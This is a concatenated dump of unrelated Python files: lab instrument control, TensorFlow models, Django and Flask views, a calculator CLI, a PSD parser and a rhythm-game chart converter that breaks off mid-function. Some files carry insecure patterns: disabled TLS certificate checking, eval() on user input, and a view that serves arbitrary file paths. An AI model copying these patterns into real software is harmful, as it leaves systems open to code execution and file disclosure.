voltage [mV/s]\ntarget_gate = 50\nshift_voltage= 10 #in the case the intended gate pattern in not symmetrical around 0.\ngate_points = 500\nsafe_gate_current = 2.5e-6 # [A], safe current leakage limit. With in this limit, the oxide resistance below 4MOhm at 10Vg (400KOhm at 1Vg)) to be considerred not leacky!\n\n# HF2LI settings\nmeasure_amplitude = 0.1 #measurement amplitude [V]\nmeasure_output_channnel = 1\nmeasure_input_channnel = 1\nmeasure_frequency = 77 #[Hz]\ndemodulation_time_constant = 0.01\ndeamodulation_duration = 0.3\n\nbias_resistor = 1e6\ncalibration_factor = 1.45 # to compensate the shift in resistance measurement\n\n\n# output setting\ndo_plot = True\nwatch_gate_leakage = True # monitors the gate leakage and stops above the safe leakage limit\nsave_data =True\n\npygame.init()\npygame.display.set_mode((100,100))\n\n##########################################################\n''' Initializing the devices '''\n\n# initial configuration of the Lock-in\napilevel_example = 6 # The API level supported by this example.\n(daq, device, props) = zhinst.utils.create_api_session(device_id, apilevel_example, required_devtype='.*LI|.*IA|.*IS')\nzhinst.utils.api_server_version_check(daq)\nzhinst.utils.disable_everything(daq, device)\nout_mixer_channel = zhinst.utils.default_output_mixer_channel(props)\n\n\n# Keysight setting\ngate_dev = Keysight_B2901A('TCPIP::192.168.1.63::INSTR')\ngate_dev.SetModeVoltage()\ngate_dev.SetOutputOn()\ngate_dev.SetComplianceCurrent(safe_gate_current)\n\n\n#############################################################\n''' MEASUREMENT'''\n\n# generating gate pattern\npattern = gate_pattern(target_gate=target_gate, mode='double', data_points=gate_points, shift_voltage= shift_voltage )\n\n\n# Resistance measurement while modulating the gate voltage\ncount = 0 # couter of step numbers\nleakage_current = 0\n\nidstring = sample_name\nif save_data:\n\tcolnames = ['step ()','gate voltage (V)','leakage current (nA)','Resistance (k ohm)','phase ()', 'demodulation duration 
(s)']\n\tmy_file_2= stlab.newfile(prefix+'_',idstring,autoindex=True,colnames=colnames)\n\nramp_time = np.abs(np.floor(shift_voltage/ramp_speed))\ngate_dev.RampVoltage(shift_voltage,tt=10*ramp_time, steps = 100)\n\ngate_voltage_step = pattern['ramp_pattern'][1]-pattern['ramp_pattern'][0]\n# ramp_time = np.abs(np.floor(gate_voltage_step/ramp_speed))\nramp_time = 0.5\nplt_Vg=np.array([])\nplt_resistance=np.array([])\nplt_leak_curr=np.array([])\n\n\nEND = False\n\nfor count,gate_voltage in enumerate(pattern['ramp_pattern']): # ramping up the gate voltage\n\n\tfor event in pygame.event.get():\n\t\tif event.type == QUIT:sys.exit()\n\t\telif event.type == KEYDOWN and event.dict['key'] == 101:\n\t\t\tEND = True\n\n\tif END:\n\t\tbreak\n\n\tgate_dev.RampVoltage(gate_voltage,tt=ramp_time, steps = 5)\n\n\tleakage_current = float(gate_dev.GetCurrent()) # in the units of [A]\n\n\tprint ('\\n\\n------------------------')\n\n\n\tif watch_gate_leakage:\n\t\tif np.abs(leakage_current) > safe_gate_current:\n\t\t\tGATE_LEAKAGE = True\n\t\t\tprint ('gate current', 1e9*leakage_current, ' nA exceeds safe gate current limit reaching the gate voltage of', gate_voltage, 'V.')\n\t\t\tprint ('reseting the gate voltage')\n\t\t\tgate_dev.RampVoltage(0,tt=ramp_time, steps = 10)\n\t\t\tbreak\n\n\tprint('GATE: {:6.4f}'.format(gate_voltage), 'V')\n\n\t# time.sleep(time_step)\n\n\tmeasured = R_measure(device_id, amplitude=measure_amplitude,\n\t\tout_channel = measure_output_channnel,\n\t\tin_channel = measure_input_channnel,\n\t\ttime_constant = demodulation_time_constant,\n\t\tfrequency = measure_frequency,\n\t\tpoll_length = deamodulation_duration,\n\t\tdevice=device, daq=daq,\n\t\tout_mixer_channel=out_mixer_channel,\n\t\tbias_resistor=bias_resistor)\n\n\tmeasured[0]*=(np.cos(math.radians(measured[1]))*calibration_factor)\n\n\tline = [count,gate_voltage, leakage_current] + measured\n\n\tif save_data:\n\t\tstlab.writeline(my_file_2,line)\n\n\n\n\tprint('LEAKAGE CURRENT: {:6.4f}'.format(1e9*leakage_current), 'nA')\n\tprint('RESISTANCE: {:6.2f}'.format(measured[0]), 'kOhms')\n\tprint('PHASE {:4.2f}'.format(measured[1]))\n\n\tplt_Vg = np.append(plt_Vg,gate_voltage)\n\tplt_resistance = np.append(plt_resistance,measured[0])\n\tplt_leak_curr = np.append(plt_leak_curr,leakage_current)\n\n\tplt.rcParams[\"figure.figsize\"] = [16,9]\n\tplt.subplot(2, 1, 1)\n\tplt.plot(plt_Vg,plt_resistance, '--r',marker='o')\n\n\tplt.ylabel('Resistance (k$\\Omega$)')\n\tplt.title(prefix+'_'+sample_name)\n\n\n\tplt.subplot(2, 1, 2)\n\tplt.plot(plt_Vg,1e9*plt_leak_curr, '--r', marker='o')\n\tplt.ylabel('Leakage Current (nA)')\n\tplt.xlabel('Gate Voltage (V)')\n\tplt.title(\"Resistance = %4.2f k$\\Omega$, Leackage Current = %4.2f nA\" %(measured[0], 1e9*leakage_current))\n\n\tplt.pause(0.1)\n\n\nprint('RAMPING FINISHED')\n\ngate_dev.RampVoltage(0,tt=ramp_time) # to safely return back the gate voltage\n\n\nzhinst.utils.disable_everything(daq, device)\ngate_dev.SetOutputOff()\n\nprint('FINISHED')\n\n\n#######################################################################\n''' saving the data '''\n\nif save_data:\n\n\n\t# saving the metafile\n\tplt.savefig(os.path.dirname(my_file_2.name)+'\\\\'+prefix)\n\tmy_file_2.close()\n\n\tparameters = ['target gate (V)',\n\t\t'time step (s)',\n\t\t'gate points ()',\n\t\t'measure amplitude (V)',\n\t\t'measure frequency (Hz)',\n\t\t'bias resistor (Ohm)',\n\t\t'deamodulation duration (s)',\n\t\t'demodulation time constant (s)',\n\t\t'temperature (K)']\n\n\tT = tempdev\n\n\tparameters_line 
=[target_gate,\n\t\ttime_step,\n\t\tgate_points,\n\t\tmeasure_amplitude,\n\t\tmeasure_frequency,\n\t\tbias_resistor,\n\t\tdeamodulation_duration,\n\t\tdemodulation_time_constant,\n\t\tT]\n\tmy_file= stlab.newfile(prefix+'_',idstring + '_metadata',autoindex=False,colnames=parameters,usefolder=False,mypath = os.path.dirname(my_file_2.name),usedate=False)\n\tstlab.writeline(my_file,parameters_line)\n\n\t# saving the plots\n\ttitle = 'Resistance'\n\tcaption = ''\n\tstlab.autoplot(my_file_2,'gate voltage (V)','Resistance (k ohm)',title=title,caption=caption)\n\ttitle = 'Phase'\n\tcaption = ''\n\tstlab.autoplot(my_file_2,'gate voltage (V)','phase ()',title=title,caption=caption)\n\ttitle = 'Duration'\n\tcaption = ''\n\tstlab.autoplot(my_file_2,'gate voltage (V)','demodulation duration (s)',title=title,caption=caption)\n\ttitle = 'Leakage Current'\n\tcaption = ''\n\tstlab.autoplot(my_file_2,'gate voltage (V)','leakage current (nA)',title=title,caption=caption)\n\n\n\n\n\n","sub_path":"DC measurements/Others/GateGraphene_HF2LI_B2901A_v1.py","file_name":"GateGraphene_HF2LI_B2901A_v1.py","file_ext":"py","file_size_in_byte":7318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"168359554","text":"import xml.etree.ElementTree as ET\nimport urllib.request, urllib.parse, urllib.error\nimport ssl\n\nCTX = ssl.create_default_context()\nCTX.check_hostname = False\nCTX.verify_mode = ssl.CERT_NONE\n\nURL = 'http://py4e-data.dr-chuck.net/comments_227372.xml'\nData = urllib.request.urlopen(URL, context=CTX).read()\nTree = ET.fromstring(Data)\nlst = Tree.findall('comments/comment')\n\nCount = 0\nSum = 0\nfor item in lst:\n Sum = Sum + int(item.find('count').text)\n Count = Count + 1\n\nprint(Count, 'Entries!')\nprint('Sum:', Sum)\n","sub_path":"xml_test.py","file_name":"xml_test.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"545454289","text":"# ---------PATH------------\r\nROOT_DIR = '/home/daizelin/hybrid_3/'\r\nRAW_DATA = 'data/police_train.csv'\r\nTEST_DATA = 'data/police_test.csv'\r\n\r\nEMBEDDING_FILE = 'embedding/taizhou_min_count_1_window_5_300d.word2vec'\r\nTRAIN_FILE = 'output/intermediate/train.tsv'\r\nWORD2ID_FILE = 'output/intermediate/word2id.pkl'\r\nVALID_FILE = 'output/intermediate/valid.tsv'\r\nTEST_FILE = 'output/intermediate/test.tsv'\r\nLOG_PATH = 'output/logs'\r\nSTOP_WORD_LIST = 'data/stop_list_chn.txt'\r\nCHECKPOINT_DIR = 'output/checkpoints/hybrid_3.ckpt'\r\n\r\n\r\n# ---------DATA PARAM--------------\r\nis_debug = False\r\nflag_words = ['', '']\r\nmax_len = 25\r\n\r\n# ------------NET PARAM------------\r\nseed = 2018\r\ndevice = 0\r\nlabels = range(9)\r\nplot_path = 'output/img/loss_acc.jpg'\r\n### ----------ATTENTION------------\r\nattention_size = 1500\r\n### ----------CAPSULE--------------\r\n### ----------HYBRID---------------\r\n#### -------REINFORCED_CNN---------\r\nvocab_size = 1000000\r\nword_embedding_dimension = 300\r\nfilters = 32\r\ndropout = 0.2\r\nkernel_size = [3, 5, 7]\r\n#### -------REINFORCED_GRU---------\r\nhidden_size = 128\r\nbi_flag = True\r\nnum_layer = 1\r\n\r\n\r\n### -------TRAIN-------------\r\nnum_epoch = 4\r\nbatch_size = 128\r\ninitial_lr = 0.01\r\nlr_decay_mode = \"custom_decay\"\r\nuse_cuda = True\r\nuse_mem_track = 
False\r\n","sub_path":"hybrid_3/config/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"101872861","text":"\"\"\"Define the model.\"\"\"\n\nimport tensorflow as tf\n\nfrom voice_embedding.triplet_loss import batch_all_triplet_loss\nfrom voice_embedding.triplet_loss import batch_hard_triplet_loss\nfrom tensorflow.contrib.losses.python.metric_learning.metric_loss_ops import triplet_semihard_loss\nfrom voice_embedding.voice.constant import VOICE_STFT_T\n\n\nslim = tf.contrib.slim\n\ndef build_model(is_training, images, params):\n return build_model_vggish_slim(is_training, images, params)\n\n\ndef build_model_vggish_slim(training, images, params):\n \"\"\"Defines the VGGish TensorFlow model.\n\n All ops are created in the current default graph, under the scope 'vggish/'.\n\n The input is a placeholder named 'vggish/input_features' of type float32 and\n shape [batch_size, num_frames, num_bands] where batch_size is variable and\n num_frames and num_bands are constants, and [num_frames, num_bands] represents\n a log-mel-scale spectrogram patch covering num_bands frequency bands and\n num_frames time frames (where each frame step is usually 10ms). This is\n produced by computing the stabilized log(mel-spectrogram + params.LOG_OFFSET).\n The output is an op named 'vggish/embedding' which produces the activations of\n a 128-D embedding layer, which is usually the penultimate layer when used as\n part of a full model with a final classifier layer.\n\n Args:\n training: If true, all parameters are marked trainable.\n\n Returns:\n The op 'vggish/embeddings'.\n \"\"\"\n # Defaults:\n # - All weights are initialized to N(0, INIT_STDDEV).\n # - All biases are initialized to 0.\n # - All activations are ReLU.\n # - All convolutions are 3x3 with stride 1 and SAME padding.\n # - All max-pools are 2x2 with stride 2 and SAME padding.\n INIT_STDDEV = 0.01\n with slim.arg_scope([slim.conv2d, slim.fully_connected],\n weights_initializer=tf.truncated_normal_initializer(\n stddev=INIT_STDDEV),\n biases_initializer=tf.zeros_initializer(),\n activation_fn=tf.nn.relu,\n trainable=training), \\\n slim.arg_scope([slim.conv2d],\n kernel_size=[3, 3], stride=1, padding='SAME'), \\\n slim.arg_scope([slim.max_pool2d],\n kernel_size=[2, 2], stride=2, padding='SAME'), \\\n tf.variable_scope('vggish'):\n # Input: a batch of 2-D log-mel-spectrogram patches.\n '''\n features = tf.placeholder(\n tf.float32, shape=(None, params.NUM_FRAMES, params.NUM_BANDS),\n name='input_features')\n '''\n features = images\n # Reshape to 4-D so that we can convolve a batch with conv2d().\n net = tf.reshape(features, [-1, VOICE_STFT_T, params.signal[\"n_mels\"], 1])\n\n # The VGG stack of alternating convolutions and max-pools.\n net = slim.conv2d(net, 64, scope='conv1')\n net = slim.max_pool2d(net, scope='pool1')\n net = slim.conv2d(net, 128, scope='conv2')\n net = slim.max_pool2d(net, scope='pool2')\n net = slim.repeat(net, 2, slim.conv2d, 256, scope='conv3')\n net = slim.max_pool2d(net, scope='pool3')\n net = slim.repeat(net, 2, slim.conv2d, 512, scope='conv4')\n net = slim.max_pool2d(net, scope='pool4')\n\n # Flatten before entering fully-connected layers\n net = slim.flatten(net)\n net = slim.repeat(net, 2, slim.fully_connected, 1000, scope='fc1')\n # The embedding layer.\n net = slim.fully_connected(net, params.embedding_size, scope='fc2')\n return tf.identity(net, name='embedding')\n\n\ndef 
build_model_old(is_training, images, params):\n \"\"\"Compute outputs of the model (embeddings for triplet loss).\n\n Args:\n is_training: (bool) whether we are training or not\n images: (dict) contains the inputs of the graph (features)\n this can be `tf.placeholder` or outputs of `tf.data`\n params: (Params) hyperparameters\n\n Returns:\n output: (tf.Tensor) output of the model\n \"\"\"\n out = images\n # Define the number of channels of each convolution\n # For each block, we do: 3x3 conv -> batch norm -> relu -> 2x2 maxpool\n num_channels = params.num_channels\n bn_momentum = params.bn_momentum\n channels = [num_channels, num_channels * 2]\n # input has shape [batch_size, VOICE_STFT_T, params.signal[\"n_mels\"]]\n for i, c in enumerate(channels):\n with tf.variable_scope('block_{}'.format(i+1)):\n out = tf.layers.conv2d(out, c, 3, padding='same')\n if params.use_batch_norm:\n out = tf.layers.batch_normalization(out, momentum=bn_momentum, training=is_training)\n out = tf.nn.relu(out)\n out = tf.layers.max_pooling2d(out, 2, 2)\n\n assert out.shape[1:] == [int((VOICE_STFT_T-1)/4), 20, num_channels * 2], out.shape[1:]\n\n out = tf.reshape(out, [-1, int((VOICE_STFT_T-1)/4) * 20 * num_channels * 2])\n with tf.variable_scope('fc_1'):\n out = tf.layers.dense(out, params.embedding_size)\n\n return out\n\n\n\n\n\ndef model_fn(features, labels, mode, params):\n \"\"\"Model function for tf.estimator\n\n Args:\n features: input batch of images\n labels: labels of the images\n mode: can be one of tf.estimator.ModeKeys.{TRAIN, EVAL, PREDICT}\n params: contains hyperparameters of the model (ex: `params.learning_rate`)\n\n Returns:\n model_spec: tf.estimator.EstimatorSpec object\n \"\"\"\n is_training = (mode == tf.estimator.ModeKeys.TRAIN)\n\n images = tf.feature_column.input_layer(features, params.feature_columns)\n images = tf.reshape(images, [-1, VOICE_STFT_T, params.signal[\"n_mels\"], 1])\n assert images.shape[1:] == [VOICE_STFT_T, params.signal[\"n_mels\"], 1], \"{}\".format(images.shape)\n\n # -----------------------------------------------------------\n # MODEL: define the layers of the model\n with tf.variable_scope('model'):\n # Compute the embeddings with the model\n embeddings = build_model(is_training, images, params)\n embedding_mean_norm = tf.reduce_mean(tf.norm(embeddings, axis=1))\n tf.summary.scalar(\"embedding_mean_norm\", embedding_mean_norm)\n\n if mode == tf.estimator.ModeKeys.PREDICT:\n input_labels = features[\"labels\"]\n print(\"Label is: {}\".format(input_labels))\n predictions = {'embeddings': embeddings, 'labels': input_labels}\n return tf.estimator.EstimatorSpec(mode=mode, predictions=predictions)\n\n labels = tf.cast(labels, tf.int64)\n #labels = tf.Print(labels, [labels], \"Batch labels: \", summarize=10)\n '''\n freq_y, freq_idx, freq_count = tf.unique_with_counts(labels)\n labels = tf.Print(labels, [labels, freq_y, freq_count], \"Batch labels: \", summarize=50)\n '''\n \n # Define triplet loss\n if params.triplet_strategy == \"batch_all\":\n tf.logging.info(\"Triplet loss type: batch_all\")\n loss, fraction = batch_all_triplet_loss(labels, embeddings, margin=params.margin,\n squared=params.squared)\n elif params.triplet_strategy == \"batch_hard\":\n tf.logging.info(\"Triplet loss type: batch_hard\")\n loss = batch_hard_triplet_loss(labels, embeddings, margin=params.margin,\n squared=params.squared)\n elif params.triplet_strategy == \"batch_semihard\":\n tf.logging.info(\"Triplet loss type: batch_semihard\")\n loss = triplet_semihard_loss(labels, embeddings, 
margin=params.margin)\n else:\n raise ValueError(\"Triplet strategy not recognized: {}\".format(params.triplet_strategy))\n\n # -----------------------------------------------------------\n # METRICS AND SUMMARIES\n # Metrics for evaluation using tf.metrics (average over whole dataset)\n # TODO: some other metrics like rank-1 accuracy?\n with tf.variable_scope(\"metrics\"):\n eval_metric_ops = {\"embedding_mean_norm\": tf.metrics.mean(embedding_mean_norm)}\n\n if params.triplet_strategy == \"batch_all\":\n eval_metric_ops['fraction_positive_triplets'] = tf.metrics.mean(fraction)\n\n if mode == tf.estimator.ModeKeys.EVAL:\n return tf.estimator.EstimatorSpec(mode, loss=loss, eval_metric_ops=eval_metric_ops)\n\n\n # Summaries for training\n tf.summary.scalar('loss', loss)\n if params.triplet_strategy == \"batch_all\":\n tf.summary.scalar('fraction_positive_triplets', fraction)\n\n tf.summary.image('train_image', images, max_outputs=1)\n\n # Define training step that minimizes the loss with the Adam optimizer\n optimizer = tf.train.AdamOptimizer(params.learning_rate)\n global_step = tf.train.get_global_step()\n if params.use_batch_norm:\n # Add a dependency to update the moving mean and variance for batch normalization\n with tf.control_dependencies(tf.get_collection(tf.GraphKeys.UPDATE_OPS)):\n train_op = optimizer.minimize(loss, global_step=global_step)\n else:\n train_op = optimizer.minimize(loss, global_step=global_step)\n\n return tf.estimator.EstimatorSpec(mode, loss=loss, train_op=train_op)\n","sub_path":"TrueID/src/python/biometric/voice_embedding/voice_embedding/voice/model_fn.py","file_name":"model_fn.py","file_ext":"py","file_size_in_byte":9268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"169307637","text":"#------------------------------------------------------------------------------\n# Pylon Tutorial \"Reinforcement Learning\"\n#\n# Author: Richard Lincoln, r.w.lincoln@gmail.com\n#------------------------------------------------------------------------------\n\n__author__ = 'Richard Lincoln, r.w.lincoln@gmail.com'\n\nimport sys, logging\nfrom pylon import Case, Bus, Generator\n\nfrom pyreto import \\\n MarketExperiment, ParticipantEnvironment, ProfitTask, SmartMarket\n\nfrom pyreto.renderer import ExperimentRenderer\n\nfrom pybrain.tools.shortcuts import buildNetwork\nfrom pybrain.rl.agents import LearningAgent\nfrom pybrain.rl.learners import ENAC\n\nlogging.basicConfig(stream=sys.stdout, level=logging.DEBUG,\n format=\"%(levelname)s: %(message)s\")\n\n\"\"\" Create a simple case. \"\"\"\ng1 = Generator(name=\"G1\", p_max=60.0, p_min=0.0)\ng2 = Generator(name=\"G2\", p_max=100.0, p_min=0.0)\nbus1 = Bus(name=\"Bus1\", generators=[g1, g2], p_demand=80.0, q_demand=0.0)\ncase = Case(name=\"1Bus\", buses=[bus1])\n\n\"\"\" The market will clear submitted offers/bids and return dispatch info. \"\"\"\nmkt = SmartMarket(case)\n\nagents = []\ntasks = []\nfor g in bus1.generators:\n \"\"\" Create an environment for each agent with an asset and a market. \"\"\"\n env = ParticipantEnvironment(g, mkt, n_offbids=2)\n\n \"\"\" Create a task for the agent to achieve. \"\"\"\n task = ProfitTask(env)\n\n \"\"\" Build an artificial neural network for the agent. \"\"\"\n net = buildNetwork(task.outdim, task.indim, bias=False,\n outputbias=False)\n# net._setParameters(array([9]))\n\n \"\"\" Create a learning agent with a learning algorithm. \"\"\"\n agent = LearningAgent(module=net, learner=ENAC())\n \"\"\" Initialize parameters (variance). 
\"\"\"\n# agent.setSigma([-1.5])\n \"\"\" Set learning options. \"\"\"\n agent.learner.alpha = 2.0\n # agent.learner.rprop = True\n agent.actaspg = False\n# agent.disableLearning()\n\n agents.append(agent)\n tasks.append(task)\n\n\"\"\" The Experiment will coordintate the interaction of the given agents and\ntheir associated tasks. \"\"\"\nexperiment = MarketExperiment(tasks, agents, mkt)\nexperiment.setRenderer(ExperimentRenderer())\n\n\"\"\" Instruct the experiment to coordinate a set number of interactions. \"\"\"\nexperiment.doInteractions(3)\n","sub_path":"doc/tutorials/rl.py","file_name":"rl.py","file_ext":"py","file_size_in_byte":2247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"272827869","text":"from django.shortcuts import render\nfrom django.http import Http404, HttpResponse\nfrom forms import *\nfrom models import *\n\n# render home page\ndef populate_home_page(request):\n\tsuccess = 0\n\tif request.method == 'POST':\n\t\tform = NewUser(request.POST)\n\t\tif form.is_valid():\n\t\t\tu = Contact(email = form.cleaned_data['email'],)\n\t\t\tu.save()\n\t\t\tsuccess = 2\n\t\telse:\n\t\t\tform = NewUser()\n\t\t\tsuccess = 1\n\telse:\n\t\tform = NewUser()\n\n\treturn render(request, 'index.html', {'form': form, 'success': success})\n\n# deals with static files (frontend)\ndef return_static_file(request, fname):\n\ttry:\n\t\tf = open(os.path.join(os.getcwd(), fname))\n\t\treturn HttpResponse(f.read())\n\texcept:\n\t\t raise Http404(\"File \" + os.path.join(os.getcwd(), fname) + \" does not exist.\")","sub_path":"portal/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"77558301","text":"from . 
import mapping\nimport os\nimport matplotlib.pyplot as plt\nfrom flask import render_template\nimport base64\n\n@mapping.route('/')\ndef index():\n plt.plot([1, 2, 3, 4])\n plt.ylabel('some numbers')\n # import logging\n # logging.error('1111')\n from run import app\n app.logger.error('An error occurred')\n # raise Exception(\"Custom exception\")\n plt.savefig(os.getcwd() + '/temp/temp.jpg')\n form = \"\"\n with open(os.getcwd() + '/temp/temp.jpg','rb') as rf:\n # byte -> base64 and byte -> str\n form = base64.b64encode(rf.read()).decode(encoding=\"utf-8\")\n # Check the type of form\n print(type(form))\n return render_template('mapping/mapping.html', form=form)\n\n@mapping.route('/echarts')\ndef echarts():\n form = \"\"\n return render_template('mapping/echarts.html', form=form)\n","sub_path":"app/mapping/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"523786847","text":"#!/usr/bin/env python3\n#\n# Command line calc tools programme\n#\n\n\nfrom math import *\n\n\ndef version():\n ver = 'Calc Command Line Tools V1.0'\n print(\"\\033[1;32m%s\\033[0m\" % ver)\n\n\ndef run():\n version()\n\n while True:\n cmd = input(\">>> \")\n # Skip empty input (Enter key)\n if (cmd == ''):\n continue\n\n if (cmd.lower() == 'q'):\n break\n\n try:\n # eval func: string to expression\n print(eval(cmd))\n except:\n print(\"\\033[1;31mExpression error, please input again.\\033[0m\")\n\n\nif __name__ == '__main__':\n run()\n","sub_path":"calc/calc-cmd.py","file_name":"calc-cmd.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"175167395","text":"import psd_tools.reader\nimport psd_tools.decoder\nfrom psd_tools.constants import TaggedBlock, SectionDivider, ImageResourceID\nimport matplotlib.pyplot as plt\n\nimage_path = '../psd/Case_204_G11_40.psd'\n#image_path = './Case_271_O6_40.psd'\n#image_path = '/./Case_322_I3_40.psd'\nim = plt.imread(image_path)\n\nwith open(image_path, 'rb') as fp:\n binary = psd_tools.reader.parse(fp)\n decoded = psd_tools.decoder.parse(binary)\n\nimg_dict = decoded.image_resource_blocks\nfor item in img_dict:\n if item.resource_id == 1080:\n count_data=item\n\ncount_level = count_data.data.descriptor.items[1][1][0]\nid_list = [str(item.items[3][1].value) for item in count_level]\nnum_labels = len(id_list)\n\nraw_data_pos_dict = {}\nfor i in range(num_labels):\n raw_data_pos_dict[id_list[i]] = count_level[i].items[7][1].items\n\ndata_pos_dict = {}\nfor key,value in raw_data_pos_dict.items(): # In Python 2.7 this was .iteritems()\n data_pos_dict[key] = [[float(point.items[0][1].value),float(point.items[1][1].value)] for point in value]\n\nprint (data_pos_dict.keys())\nprint ([len(data_pos_dict[key]) for key in data_pos_dict])\nchoice1 = data_pos_dict[list(data_pos_dict.keys())[0]] # In Python 2.7 this was choice1 = data_pos_dict[data_pos_dict.keys()[0]]\nx1,y1 = [i[0] for i in choice1],[i[1] for i in choice1]\nchoice2 = data_pos_dict[list(data_pos_dict.keys())[1]]\nx2,y2 = [i[0] for i in choice2],[i[1] for i in choice2]\nchoice3 = data_pos_dict[list(data_pos_dict.keys())[2]]\nx3,y3 = [i[0] for i in choice3],[i[1] for i in choice3]\nchoice4 = data_pos_dict[list(data_pos_dict.keys())[3]]\nx4,y4 = [i[0] for i in choice4],[i[1] for i in choice4]\n\nimplot = 
plt.imshow(im)\nplt.scatter(x1,y1,s=4,c='r')\nplt.scatter(x2,y2,s=4,c='c')\nplt.scatter(x3,y3,s=4,c='violet')\nplt.scatter(x4,y4,s=4)\nplt.show()\n","sub_path":"labels/psd_parse_and_plot.py","file_name":"psd_parse_and_plot.py","file_ext":"py","file_size_in_byte":1784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"625005140","text":"import glob\r\nimport json\r\nimport os\r\nimport shutil\r\n\r\nimport hexdump\r\n\r\nUSE_TIMESIGS = False\r\n\r\ndef read_string(data, offset):\r\n string_bytes = data[offset:data.index(b'\\0', offset)]\r\n return string_bytes.decode('shift-jis').strip('\\0')\r\n\r\n\r\ndef convert_raw_chart(found_charts, song_info=None):\r\n song_id = song_info['song_id']\r\n bpm = song_info['bpm']\r\n\r\n # Parse ttb file for timestamps\r\n ttb_path = os.path.join(\"raw_data_dct\", \"ttb%03d02.bin\" % song_id)\r\n ttb_by_measure = {}\r\n ttb_data = bytearray(open(ttb_path, \"rb\").read())\r\n ttb_header = ttb_data[:8]\r\n ttb_data = ttb_data[8:]\r\n\r\n measure_timestamps = {}\r\n cur_bars = 0\r\n\r\n bpms = {0: 0}\r\n\r\n song_offset_time = int.from_bytes(ttb_data[2:4], 'little')\r\n song_offset = (((song_offset_time * 441) / 75) * 100) / 44100\r\n song_offset = -song_offset\r\n\r\n timing_info_by_bar = {}\r\n requires_timing_info = False\r\n last_time_sig = None\r\n measure_to_beat = {}\r\n last_measure = 0\r\n\r\n cur_bar_len = 4\r\n for i in range(4, len(ttb_data) - 4, 4):\r\n prev_bar_len = cur_bar_len\r\n cur_time = int.from_bytes(ttb_data[i+2:i+4], 'little')\r\n prev_time = int.from_bytes(ttb_data[i+2-4:i+4-4], 'little')\r\n cur_bar_len = int.from_bytes(ttb_data[i-4:i+2-4], 'little')\r\n\r\n cur_timestamp = (((cur_time * 441) / 75) * 100) / 44100\r\n prev_timestamp = (((prev_time * 441) / 75) * 100) / 44100\r\n\r\n if song_offset is None:\r\n song_offset = -prev_timestamp\r\n\r\n d = (cur_bar_len / 4) * 4 if USE_TIMESIGS else 4\r\n cur_bpm = 1 / (((cur_timestamp - prev_timestamp) * (1000 / d)) / 60000)\r\n\r\n # print(cur_bars, \"%04x (%f) %04x (%f)\" % (prev_time, prev_timestamp, cur_time, cur_timestamp), cur_bpm, cur_bar_len)\r\n\r\n if last_time_sig is None or cur_bar_len != last_time_sig:\r\n timing_info_by_bar[cur_bars] = cur_bar_len\r\n last_time_sig = cur_bar_len\r\n\r\n if cur_bar_len != 4:\r\n requires_timing_info = True\r\n\r\n bpms[cur_bars] = cur_bpm\r\n cur_bars += cur_bar_len if USE_TIMESIGS else 4\r\n\r\n if cur_bar_len != 4:\r\n print(\"Found bar of %d in %s\" % (cur_bar_len, song_info['title']))\r\n\r\n ### Handle conversion of chart\r\n chart = \"\"\"#TITLE:%s;\r\n#MUSIC:bgm.mp3;\r\n#PREVIEW:preview.mp3;\r\n#OFFSET:%lf;\r\n#BPMS:%s;\r\n#DISPLAYBPM:%d;\r\n\"\"\" % (song_info.get('title', '(Untitled)'), song_offset, \",\".join([\"%d=%f\" % (k, bpms[k]) for k in bpms]), song_info.get('bpm', 128))\r\n\r\n if requires_timing_info and USE_TIMESIGS:\r\n chart += \"#TIMESIGNATURES:%s;\" % (\",\".join([\"%d=%d=4\" % (k, timing_info_by_bar[k]) for k in timing_info_by_bar]))\r\n\r\n for idx, data in found_charts:\r\n valid_charts = [0, 1, 2, 7, 8]\r\n\r\n if idx not in valid_charts:\r\n continue\r\n\r\n chart_type = {\r\n 0: \"dance-single\",\r\n 1: \"dance-single\",\r\n 2: \"dance-single\",\r\n 3: \"dance-couple\",\r\n 4: \"dance-couple\",\r\n 5: \"dance-couple\",\r\n 7: \"dance-double\",\r\n 8: \"dance-double\",\r\n }[idx]\r\n\r\n chart_diff = {\r\n 0: \"Easy\",\r\n 1: \"Medium\",\r\n 2: \"Hard\",\r\n 3: \"Easy\",\r\n 4: \"Medium\",\r\n 5: \"Hard\",\r\n 7: \"Easy\",\r\n 8: \"Medium\",\r\n }[idx]\r\n\r\n 
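        # Chart slots 0-2 map to single basic/trick/maniac, 3-5 to couple, and 7-8 to double
        # (slot 6 is unused here); the difficulty lookup below reuses the same slot indexing.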
